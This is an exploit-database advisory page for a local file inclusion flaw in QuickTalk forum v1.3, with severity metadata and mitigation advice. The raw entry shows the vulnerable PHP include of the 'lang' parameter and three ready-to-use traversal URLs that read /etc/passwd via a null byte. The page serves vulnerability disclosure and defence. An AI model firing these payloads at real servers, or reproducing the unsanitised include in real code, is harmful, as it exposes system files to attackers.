header-logo
Suggest Exploit
vendor:
QuickTalk forum
by:
katatafish
5.5
CVSS
MEDIUM
Local File Inclusion
98
CWE
Product Name: QuickTalk forum
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE:
CPE: qt-cute:quicktalk_forum:1.3
Metasploit:
Other Scripts:
Platforms Tested:
2007

QuickTalk forum v1.3 Local File Inclusion

The QuickTalk forum v1.3 is vulnerable to local file inclusion. An attacker can exploit this vulnerability by injecting a malicious string into the 'lang' parameter, which is then used to include a file from the server.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate file paths before including them in the code. Additionally, it is advised to restrict file inclusion to specific directories.
Source

Exploit-DB raw data:

###QuickTalk forum v1.3 Local File Inclusion###

#download: http://www.qt-cute.org/download/qtf13.zip

#found by: katatafish (karatatata@hush.com)

#vulncode:
 $strLang = $_GET["lang"];
 include("language/$strLang/qtf_lang_reg.inc");

#exploits:

 http://www.site.com/[path]/qtf_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
 http://www.site.com/[path]/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00
 http://www.site.com/[path]/qtf_j_exists.php?lang=./../../../../../../../../../../etc/passwd%00

#thanks:str0ke

# milw0rm.com [2007-06-27]

Navigation

Suggest Exploit

Services By CQR